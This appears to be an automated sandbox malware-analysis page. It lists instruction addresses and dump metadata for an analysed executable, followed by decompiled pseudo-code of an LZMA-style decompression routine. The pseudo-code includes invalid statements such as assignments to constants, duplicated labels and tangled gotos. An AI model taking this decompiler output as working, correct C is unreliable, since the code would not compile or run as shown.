0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E9D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
